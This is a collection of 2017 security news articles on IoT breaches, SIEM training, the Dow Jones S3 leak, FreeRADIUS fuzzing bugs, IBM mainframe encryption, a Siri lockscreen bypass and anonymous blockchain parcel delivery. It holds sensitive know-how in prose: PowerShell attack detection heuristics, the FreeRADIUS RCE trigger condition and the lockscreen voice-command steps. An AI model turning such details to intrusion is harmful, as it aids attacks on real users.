STE WILLIAMS

IoT Security Incidents Rampant and Costly

New research offers details about the hidden – and not so hidden – costs of defending the Internet of Things. PreviousNext

Image Source: Shutterstock

Image Source: Shutterstock

Internet of Things breaches and security incidents have hit nearly half of the companies that use such devices, and the cost to deal with these attacks is usually more than traditional breaches, according to recent survey results.

In two separate reports, each of the studies found that 46% of respondents report they suffered a security breach or incident as a result of an attack on IoT devices.

One survey, released this month by IDC, queried approximately 100 IT security, IT operations, and other C-level suite executives, while another, released in June by consulting firm Altman Vilandrie Co., gathered data from approximately 400 IT executives in 19 countries.

Not only are the costs associated with securing IoT devices expected to rise in the coming years but they are also expected to account for as much as of a third of the IT spending budget, according to Altman Vilandrie. The vast majority of IDC survey respondents say the cost to address IoT security incidents and breaches tends to run more than the cost of fixing traditional breaches and incidents.

Here is a breakdown of the combined results. 

 

Dawn Kawamoto is an Associate Editor for Dark Reading, where she covers cybersecurity news and trends. She is an award-winning journalist who has written and edited technology, management, leadership, career, finance, and innovation stories for such publications as CNET’s … View Full BioPreviousNext

Article source: https://www.darkreading.com/vulnerabilities---threats/iot-security-incidents-rampant-and-costly/d/d-id/1329367?_mc=RSS_DR_EDT

SIEM Training Needs a Better Focus on the Human Factor

The problem with security information and event management systems isn’t the solutions themselves but the training that people receive.

Logging solutions — or, more specifically, security information and event management (SIEM) solutions — have a bad reputation. Many implementations involve large sums of money and the promise to catch unauthorized and malicious activity. Fast forward a year or two into the deployment and often you will find upset senior management, exhausted security teams, and few detection capabilities. It isn’t unheard of for organizations to swap SIEM systems every couple of years, similar to how organizations treat antivirus software.

The problem isn’t with any specific SIEM solution. Instead, it’s a lack of focus on people and processes. Well-trained staff can implement a strong detection platform regardless of SIEM product. This doesn’t mean that all SIEM solutions are equal but, rather, that there is too much focus on products and not enough on people. Training from SIEM vendors is based on how to use their products. This is and should be required to properly use any solution, but it isn’t enough. SIEM is a tool, and the focus must also be on the individual(s) wielding the tool.

By changing the focus to individuals, the core problem can start to be addressed. For example, assume you or another staff member attended training on how to catch the bad guys using a SIEM system. The focus, rather than being on maintaining/using a SIEM product, is on things such as which data sources are important, why they’re important, and how to enrich those data sources so they make more sense, add context, and are more useful. The training may also include various methods to intentionally set up events to automatically send alerts on unauthorized activity. Would this individual not be better equipped to use any SIEM platform? I would argue that people who know why to use a SIEM system and what to use it for will have a much easier time figuring out how to get a SIEM platform to do what they need it to do.

The PowerShell Problem
Consider an example to illustrate this problem: PowerShell. PowerShell is a thing of beauty, allowing users to automate tasks and do things they otherwise couldn’t. However, it’s an attacker favorite to use against us. Many modern attacks use PowerShell to evade antivirus systems, whitelisting products, and other security technologies. Yet with a tactical SIEM architecture and proper logging, catching unauthorized PowerShell use can be simple. A properly trained individual can quickly use a SIEM platform to identify things such as:

  • PowerShell being invoked from a command line with a long length
  • PowerShell using base64 encoding
  • PowerShell making calls to external systems
  • A system performing large amounts of PowerShell calls
  • A system invoking PowerShell outside powershell.exe by using Sysmon DLL monitoring in conjunction with the specific PowerShell DLLs

Taking this further, a trained individual may try exporting all unique PowerShell cmdlets found within SIEM logs and turn around and use the result as a detection-based whitelist, a technique that is applicable across multiple data sources. They also may use the whitelist to filter out all logs unless they use an unknown cmdlet, thus severely decreasing the number of logs being collected. This simple process can detect 99.99% or possibly even 100% of PowerShell-based malware, and yet SIEM training doesn’t cover this concept.

This is not a failure on part of the SIEM vendors. Their training is on how to use their product, which is necessary. The problem is that SIEM-neutral training geared toward individuals didn’t exist until recently.

Remember that SIEM is a tool. Your mileage will vary dramatically, based on the individuals using the tool. If you want a successful detection platform, make sure your team is trained on the following:

  • Key data sources, including what they are, why they’re important, and how to use and collect them
  • How to enrich logs and why you need to do so
  • Intentional detection techniques such as implementing virtual tripwires
  • The difference between a bad alert (high false positives) and a good alert (low or zero false positives)

If you wish to learn more, please check out the SANS course SEC555: SIEM with Tactical Analytics or research these concepts online. The more the security community gives back, the better we’ll all do.

Related Content:

Justin Henderson is a SANS Instructor and course author of SEC555: SIEM with Tactical Analytics, and CEO of H A Security Solutions. He is a passionate security architect and researcher with over decade of experience working in the Healthcare industry. He has also had … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/siem-training-needs-a-better-focus-on-the-human-factor/a/d-id/1329348?_mc=RSS_DR_EDT

Dow Jones index – of customers, not prices – leaks from AWS repo

Dow Jones has emulated Verizon by saving various internal databases (including Wall Street Journal subscribers) in the cloud without properly securing it.

The breach was turned up by UpGuard’s Chris Vickery and is detailed in this post.

It’s an all-too-familiar, straightforward breach: someone left a cloud repository configured to offer “semi-public access”, meaning “the sensitive personal and financial details of millions of the company’s customers” was exposed.

“While Dow Jones has confirmed that at least 2.2 million customers were affected, UpGuard calculations put the number closer to 4 million accounts,” the post adds.

The repo was an AWS S3 bucket with the wrong privacy settings: by configuring it to allow access to authenticated users, whoever set it up didn’t seem to realise they were offering access to any authenticated AWS user – not just those with Dow Jones-associated accounts).

UpGuard says Chris Vickery discovered the breach at the end of May (in other words, he was working on the breach before UpGuard announced he’d joined them).

His analysis of the repo, called “dj-skynet” because even sysadmins for the quants have a sense of humour, and discovered a rich trove.

There’s a customer file – the one the company reckons has upwards of 4 million records – that includes “customer names, internal Dow Jones customer IDs, home and business addresses, and account details, such as the promotional offer under which a customer signed up for a subscription”.

There’s a risk and compliance database filled with dossiers of individuals, all the way from “a great many financial industry personnel located around the world” all the way to less salubrious characters. Below, from UpGuard’s post, is an extract of what the database holds about late Libyan leader Muammar Gaddafi.

Dow Jones has confirmed the breach but has told outfits like The Hill it wasn’t serious enough to warrant a customer announcement, since passwords and credit card numbers weren’t leaked (only enough data to mount a phishing campaign, or help identity theft). Regarding the “risk and compliance” dossiers, it says the database included only public information.

News Corporation, Dow Jones parent company, has another cloudy cock-up to defend today: Australian pay TV operation Foxtel’s streaming video service crashed when a wave of Game of Thrones fiends came in search of new episodes. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/07/18/dow_jones_index_of_customers_not_prices_leaks_from_aws_repo/

Dev to Reg: Making web pages pretty is harder than building crypto

+Comment An Australian computer scientist working in Thailand has offered his contribution to Australia’s cryptography debate by creating a public-key crypto demonstrator in less than a day, using public APIs and JavaScript.

Brandis.io not a useful encryption implementation (the site itself says as much), but is a useful public education exercise.

By using the WebCryptoAPI, author Dr Peter Kelly has implemented end-to-end crypto in just 445 lines of JavaScript code.

As Kelly writes at GitHub, “Brandis does not implement encryption itself; instead, it relies on the Web Cryptography API provided by your browser, and simply exposes a user interface to this API that enables its use by non-programmers.”

Hence its smallness: the cryptography is already out there, in the form of straightforward calls to public APIs: there’s more JavaScript devoted to screen furniture than to generating public and private keys, or encrypting/decrypting the messages.

Dr Peter Kelly's CryptoWebAPI demo, Brandis.io

Dr Kelly’s Brandis.io crypto demonstrator

As Kelly told Vulture South: “I spent way more time on [the presentation] than I did on the crypto-using code. Picking a colour scheme took longer than writing the code for generating a public/private key pair.”

Kelly warns visitors to the site not to treat this as a messaging platform: “Brandis is primarily intended as a demonstration; it was put together in less than a day. For real-world usage, we recommend more established software such as GnuPG.”

By the way, if you decide to try Brandis.io, note that its current message size limit is 95 characters. Kelly’s investigating why that’s so. ®

+Comment: Vulture South notes that kelly’s efforts only addresses one part of the debate the Australian government ignited when its Attorney-General George Brandis fired the latest shot in what’s being colloquially called “CryptoWars 2”. The other half is device security.

A common critique levelled at those who resist the idea of governments undermining encryption (the so-called “war on mathematics”, highlighted when Prime Minister Malcolm Turnbull unhelpfully quipped that Australia’s laws will prevail over he laws of mathematics) is that they’ve got the wrong end of the stick, because messages could be recovered by means that don’t attack encrypted messages in transit, but rather while they’re at rest – for example, by recovering messages as stored on devices like iPhones or Androids.

First, it’s worth keeping in mind that the government itself drew attention towards strong encryption, with its complaint that singled out specific end-to-end encrypted applications, and its promise to get platform-makers to co-operate (as well as device vendors).

More importantly, however, the argument that an endpoint compromise is okay ignores history. Whether it’s the sloppy IoT security let the Mirai botnet hose big servers or the leaked NSA tools that let loose ransomware rampages, or the DNS Changer malware attack that began in 2006, there’s ample evidence of the danger posed by insecure endpoints.

“You can’t have security if you have insecure endpoints” was first expressed to this writer in the 1990s, and it’s still true. We can’t redirect concerns about weak cryptography by saying “you can still have strong crypto, if vendors will make weak devices”.

Even the NSA couldn’t keep device exploits secret, after all. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/07/17/encryption_with_apis_and_445_lines_of_js/

FreeRADIUS fragged by fuzzer – by invitation – and fifteen fails found

The folks over at FreeRADIUS took a look at Guido Vranken’s work with OpenSSL, liked what they saw, asked him to fuzz the famous login/security server … and then didn’t like what they saw.

Pretty much anybody who’s logged into an ISP account has touched FreeRADIUS, since it’s the most popular implementation of the venerable authentication system.

As this post explains, after Vranken disclosed bugs in OpenSSL, he tipped the FreeRADIUS maintainers of a similar (now fixed) bug in their project.

They followed up by asking him to conduct a joint project, and that turned up a haul of 15 issues, four of which could be exploitable, and one of which is a remote code execution bug (RCE).

The RCE, CVE-2017-10984, is a write overflow in the data2vp_wimax() function. In version 3 series of FreeRADIUS (not version 2), anyone who can send packets accepted by the server could trigger the overflow.

The post explains that the exploit vector is via WiMAX attributes “which have the ‘continuation’ flag set, but for which there is no subsequent data”.

Absent RCE, the post notes that the bug also offers a denial-of-service vector.

The post also highlights that the fuzzing project turned up six issues in DHCP that are fixed in FreeRADIUS, mostly related to memory handling errors that offered denial-of-service vectors.

Proper deployments should be at least moderately protected if they followed best practice, since the server should not be directly exposed to the Internet. That means attack vectors should only exist for insiders, or to members of roaming consortia.

Kaspersky’s Threatpost quotes FreeRADIUS founder Alan DeKok as explaining the limited exploitability of the bugs: “To be clear: these issues aren’t exploitable by end users in any way. Even the roaming groups typically use IPSec or TLS to transport RADIUS traffic, which means they’re largely not vulnerable, either”.

Regardless, FreeRADIUS’s disappointment is palpable in the post: “There are about as many issues disclosed in this page as in the previous ten years combined”, it states (italics preserved from original post).

A long program of static tests – the post name-checks Coverity, Clang analyser, cppcheck, and PVS-Studio – clearly hasn’t been enough to turn up all the bugs, which arise because “C is a terrible language for security”.

“We will therefore be integrating the fuzzer into all future releases of the server. We will be updating our automated build system to run with memory sanitizers enabled. We strongly recommend that other software projects follow the same practices.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/07/18/freeradius_bugs/

FBI Issues Warning on IoT Toy Security

IoT toys are more than fun and games and can potentially lead to a violation of children’s privacy and safety, the Federal Bureau of Investigation warned Monday.

Internet-connected toys carry the potential of violating children’s privacy and safety, given the amount of information the toys can collect and store, the Federal Bureau of Investigation warned on Monday.

The sensors, microphones, data storage capabilities, cameras, and other multi-media features of IoT toys could potentially gather information on a child regarding their name, school, activity plans and physical location.

And if those toys are hacked, the information and data collected could potentially be used by attackers to do a child harm, the FBI warned. The FBI advisory offered advice on selecting an IoT toy, such as only connecting it to a secure and trusted WiFi network, research the toy to ensure it can receive firmware and software updates, and investigate where the information entered into the toy is stored.

Read more about the FBI advisory here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/cloud/fbi-issues-warning-on-iot-toy-security/d/d-id/1329373?_mc=RSS_DR_EDT

New IBM Mainframe Encrypts All the Things

Next-generation Z series features the elusive goal of full data encryption – from an application, cloud service, or database in transit or at rest.

In the first major mainframe announcement by IBM in a decade, the company today unveiled its next-generation Z series that supports full-blown encryption for data via applications, cloud, and databases rather than today’s more common practice of pockets of crypto.

Encryption remains a high bar for many organizations to deploy en masse; it’s more often deployed at specific layers or portions of the data flow. And yes, mainframes are still a thing: The majority of credit card transactions run on IBM mainframes today, and other financial, insurance, and travel transactions still rely on the big ol’ iron. IBM enlisted experts and customers from 150 different companies in building the architecture of the new Z system, including ADP and Highmark Healthcare.

“The challenge everyone has is it was too expensive to encrypt all of this … not really [expensive] in money, but I mean in processing time,” says Caleb Barlow, vice president of threat intelligence at IBM Security. Transaction-based systems can’t afford degradation of performance or user experience, he says. “When you’re moving money or visiting an ecommerce website … the encryption and decryption” steps can slow the process, he says.

So in most cases, encryption happens between the Web browser and the application server, or in a storage array. After each step of the data flow, the data is decrypted, so it doesn’t remain locked down.

The Z system keeps data encrypted across the board, from the network to the storage array, in what IBM calls “pervasive” encryption, explains Barlow.

IBM engineered encryption into the Z’s postage-stamp sized silicon processor: there are 6 billion transistors there dedicated to encryption processing, he says. “The machine doesn’t slow down when it’s asked to encrypt and decrypt” data, he says. The only time it’s decrypted is when an organization needs to work with the data.

The IBM Z, which sells for around $500,000 and ships this quarter, can run more than 12 billion encrypted transactions per day, and includes what IBM calls “tamper-responding” encryption keys that kills keys if there’s a sign of an attack so they can’t be stolen; it restores them when the coast is clear.

Mainframes, while less prevalent these days, are still juicy targets for attackers. Researchers at Trend Micro recently discovered IBM Z Series mainframes (aka OS/390 machines) and IBM iSeries (aka AS/400 mainframes) left exposed on the public Internet, half of which were in the US. Exposed File Transfer Protocol (FTP) ports were the culprit in many of the cases.

Trend Micro’s researchers say mainframes are at risk of what they call “business process compromise” attacks, where attackers infiltrate an organization and modify its mainframe transaction processes in order to siphon money surreptitiously.

John Clay, director of global threat intelligence communications at Trend Micro, says many exposed systems discovered via Shodan scans are misconfigured in some way. “The nice thing in what we hope to see with the IBM [Z] announcement is that an organization using the Z can implement encryption of the data at rest or in transit so that with any type of compromise” the data can’t be stolen because it’s encrypted, Clay says.

But don’t expect an all-encrypted data world anytime soon. “It’s going to take a while to get these systems in place,” Trend’s Clay notes. But it could bring about a “sea change” in the encryption space, he says.

The Ponemon Institute’s recent Global Encryption Trends Study found that in the past 11 years, the ratio of organizations with enterprise-wide encryption strategies has doubled, from less than 20% to over 40%. They mostly employ an ad-hoc encryption strategy to date: 61% of organizations encrypt employee and HR data; 56%, payment data; 49%, financial records; and 40%, customer data, according to the report.

Related Content:

Black Hat USA returns to the fabulous Mandalay Bay in Las Vegas, Nevada, July 22-27, 2017. Click for information on the conference schedule and to register.

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/new-ibm-mainframe-encrypts-all-the-things/d/d-id/1329372?_mc=RSS_DR_EDT

Siri implicated in yet another iPhone lockscreen hole

Last week, Computerworld reported a security hole in the iPhone lockscreen.

The hole wasn’t catastrophic, but when you consider that “locked” is supposed to mean locked, you shouldn’t be able to change any configuration settings on someone else’s phone without unlocking it first.

The ComputerWorld “hack” involves popping up Siri at the lockscreen by holding down the Home button for a second or so, and then saying the words, “Cellular data”. (In the UK, at least, you can also say “Mobile data”.)

Siri then asks if you’d like to turn data off, thus effectively cutting the phone off from the network.

This doesn’t sound like the end of the world from a security point of view, and perhaps it isn’t, but you can see how the feature could be abused.

By siriptiously (sorry, surreptitiously) turning off someone’s phone connection while they’re not looking, but leaving their phone apparently untouched, you could help an accomplice who is about to try some sort of social engineering attack against the victim that would otherwise attract their attention with an unwanted verification call or a warning SMS.

Sure, you could steal or hide their phone, or even just turn off the ringer, with a similar result, but a missing phone might be noticed, so to speak, and even silenced phones usually vibrate when they want attention.

According to Computerworld, the bug exists even on the latest iOS 10.3.2 release – that’s what we’re running, so we put it to the test.

Does it work?

The good news is that we couldn’t replicate Computerworld’s hack.

We were able to activate Siri, to issue the peremptory words, “Mobile data”, and to get directly at a screen offering to turn it off.

But when we told Siri to turn it off, he immediately said (our Siri is a bloke, don’t know why), “You’ll need to unlock your iPhone first,” and popped up the passcode screen to unlock the phone, as you would expect:

What to do?

The bad news is that you can never be quite sure which voice commands will, and which won’t, work when your device is locked – unless you can figure out and try all of them.

So, whether this is a bug or not, we strongly recommend that you turn Siri off at the lockscreen – after all, it’s not called the lock screen for nothing.

To stop Siri listening in at the lockscreen, go to Settings | Siri and turn off Access When Locked.

Better yet, unless you really don’t like touching your phone, consider turning Siri off altogether, which has the handy side-effect of telling Apple to discard all the pattern-matching voice data it’s collected from you so far:

While you’re about it, review the other iOS features you’ve enabled on the lockscreen, in case you’re allowing more access than you thought.

It’s bad enough that Apple no longer allows you to block access to the camera app when your phone is locked; we recommend that you add as few additional lockscreen options as you can.

Go to Settings | Touch ID Passocde and look at the Allow access when locked section:

(We’ve got Siri turned off altogether; if he/she is enabled, you’ll see him/her on in this list, too.)

Remember, when it comes to your lockscreen, less is more.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/tjz4TqHneYk/

Wait, you didn’t want to clean the toilets? Should have read the terms!

Roll up your sleeves and grab the brushes: you’re now on bathroom duty at the next county festival. Yes, you voluntarily agreed to 1,000 hours of community service when you clicked your approval of WiFi provider Purple’s terms of service (TOS).

What? You failed to read the fine print? You just swooped to the end and clicked OK? You aren’t alone. Purple has a cadre of 22,000 who willingly agreed to perform community service in return for their access to Purple’s free WiFi.

Purple added a “Community Service Clause” to their terms of service. The clause gave Purple discretion to assign community duty to the user, which included:

  • Cleansing local parks of animal waste
  • Providing hugs to stray cats and dogs
  • Manually relieving sewer blockages
  • Cleaning portable lavatories at local festivals and events
  • Painting snail shells to brighten up their existence
  • Scraping chewing gum off the streets

Purple’s intent was to highlight to all of us to read the TOS. Purple’s CEO commented:

WiFi users need to read terms when they sign up to access a network. What are they agreeing to, how much data are they sharing, and what license are they giving to providers? Our experiment shows it’s all too easy to tick a box and consent to something unfair.

So how many individuals noticed the “Community Service Clause” in Purple’s TOS?

One user, yes just one of the 22,000+ who agreed to the enhanced TOS during the two-week period of the test, disagreed with the TOS.

Those with longer memories may remember Game Station’s 2010 April Fool’s Day adjustment to their TOS and order form. Users could opt out (and receive a £5 voucher) or click through and agree to sell their immortal soul. It turned out that 88% of users were willing to give up their immortal souls.

In a 2016 paper authored by Jonathan Obar and Anne Oeldorf-Hirsh, The biggest lie on the internet: Ignoring the Privacy Policies and Terms of Service Policies of Social Networking Services, showed exactly what Purple’s two-week test showed: that the vast majority of individuals – 98% – will miss the “gotcha clauses”.

That’s because users fail to read the TOS page.  The researchers used a TOS of more than 4,300 words, which would take about 15 minutes to read properly. The median read time for the 543 university students? A blazing speed read of 51 seconds.

And yes, the content contained several items which the average user would balk at allowing. These included:

  • Provide your first-born child as payment
  • Your social network content will be shared with your employer
  • Your social network content will be shared with the NSA

Purple’s fun and the researchers findings both serve to drive home an important point.

Read what you sign!

Yes, you really do need to mine those TOS or Privacy policies for those hidden gems of “consent” buried within mind-numbing text if you don’t want to end up selling your soul.


 

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/IlNfVOeDCLs/

What does Imogen Heap have in common with mail? The blockchain

One of Bitcoin’s attractions was always anonymity, but if you used it to buy something, your parcel was always trackable. Now, some researchers have used the blockchain concept underpinning it to make deliveries anonymous, too.

Bitcoin may have made money anonymous, but the problem is that privacy collapses as soon as you touch conventional centralized institutions, like the postal service or branded delivery companies. If you don’t want someone to know what you ordered, you take a risk sending it via the mail – although with drugs so easily concealable, many in Canada have willing taken that chance for years.

Now, academics have taken the onion routing concept popularized by Tor and married it with the blockchain to produce an anonymous parcel delivery system that is difficult, if not impossible, to track.

As described in this academic paper, the Lelantos delivery system uses Ethereum, one of the most promising new blockchains. While Bitcoin stores records of financial transactions in the blockchain, Ethereum runs entire programs in it. They’re called smart contracts, and are written in a program called Solidity. The contracts are distributed across different nodes in the blockchain and therefore not controlled by any one party. They use rules and events to trigger messages and send Ethereum’s own currency, called Ether.

How Lelantos works

Bob has ordered something privately from Alice on the dark web, and doesn’t want anyone to know that he’s the recipient. Especially Eve, who has an unhealthy interest in his affairs. He could have Alice send it to a PO box, but then the mail carrier might open his parcel and tell Eve.

Instead, Bob chooses several delivery companies that support Lelantos. He uses the Ethereum smart contract to organize them in a chain, with each relaying the package to another.

Along with his order to Alice, he sends an encrypted message with a tracking number and the address of the first delivery company in his chain. He also sends encrypted messages to a selection of chosen delivery companies. Each contains the encrypted addresses of the other delivery companies.

Alice takes his Ether, and sends the incriminating item to the first company. Bob’s smart contract, which is keeping track of all this, then gives it instructions to create a label using the address of the next company in the chain. Each time the parcel arrives at a new delivery company, the smart contract (which no one can link to Bob) instructs that company to send it on using the encrypted address they were given.

He can do this as many times as he likes, getting delivery companies to play pass the parcel until he feels confident to collect the parcel. He then sends a message to stop relaying the parcel and wait for him to come and pick up the item. So at no point will any party know the source and destination of the package, meaning that if they opened it, they wouldn’t be able to compromise Bob.

Even the most nefarious villains sometimes slip up. Ross Ulbricht, the mastermind behind the Silk Road dark web site, was finally collared after ordering fake identity documents from Canada delivered to his address on 15th Street in San Francisco. The police intercepted the package and paid him a visit, as they outline in this document, which is a fascinating account of OPSEC gone wrong.

If anyone ever deploys Lelantos, we’ve no doubt that people will use it to deliver goods and materials that are against the law, like Ulbricht. That’s predictable, but assuming that Bob wasn’t the illegal type, why might he want to use an anonymous delivery service as a legitimate user?

The paper raises the spectre of Eve profiling him based on his reading habits, or targeting him for burglary after seeing that he had expensive items delivered. He might buy certain legal medicines by mail, or an HIV test kit, and Eve might work for his life insurance company.

The Lelantos paper also cites another use case: simple communication. Former president Jimmy Carter apparently prefers the postal service as a means of communicating with world leaders, because he doesn’t trust the intelligence agencies not to read his emails. For true privacy, perhaps he should consider a service like Bob’s?

From anonymous parcels to fair music

This is an ingenious use of the blockchain, and follows a trend in the use of the technology which tends to cut out the middle person. As with its original application in Bitcoin, the idea with many newer implementations is to remove a single player – a bank, a large”sharing economy” broker, an auction-style e-commerce marketplace – and connect people directly to each other, giving them a way to transact while ensuring that no one can tamper with the system.

Why wouldn’t you want a central hub to control everything? It could snoop on your data, rig markets, or just decide that it doesn’t like you and freeze your accounts. This is why the blockchain carries such promise.

While Lelantos decentralizes the parcel delivery process, another application decentralizes the music business. Some music distribution sites want to reward lots of people, specifically everyone involved in producing a song or album.

Music is an industry that the blockchain could disrupt, but there’s a right and a wrong way to do it. We’ve seen artists such as RAC go it alone to distribute entire albums directly on the Ethereum blockchain in a bid to cut out the middle man. That creates a complex and confusing process for the listener, as even he admits in this Motherboard interview.

Buying Ethereum is still something of a bottleneck, but you’re going to have to buy ether. I’d recommend going to Coinbase or something like that to buy some. The album will be on a website and will work with a lot of built-in Ethereum wallets, like MetaMask or Parity. All you need to have is the chrome browser with the ether account already attached to it.

You can almost hear thousands of fans blinking slowly and backing away as they read that.

That’s the problem with blockchain-based tech. It is inherently complex – people I know still ask “is Bitcoin money? I don’t get it. Wasn’t there that exchange that got hacked?

The blockchain might still be unfathomable for the average music fan, but it’s a great way to ensure that everyone working on a piece of creative content gets paid when someone streams or buys it online.

Musician Imogen Heap (pictured) is building one called Mycelia after experimenting with blockchain-based music distribution using Ethereum. The idea is to create a fair, sustainable music system that pays everyone involved.

If smart contracts can hold details about which delivery company to send a parcel to next and how much money to send them, then it can also hold details about who wrote the song for a particular track or did the sampling. It could also pay them their cut automatically when someone uses Ether to buy the song – and it might cut down on exploitative recording contracts.

Heap’s isn’t the only project along these lines. Muse is another blockchain-based project seeking artists to register on its network. It targets artists, and offers its information to streaming platforms, giving them the option to pay artists through its network using its internal currency, called Muse Dollars. Like Heap’s project, it’s still in the early stages.

That has little to do with transactional security or anonymity as such, but it does promote a different kind of security that seems to be central to the way that blockchains work: it maintains transparency, and keeps people honest.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/Za44K89VDm8/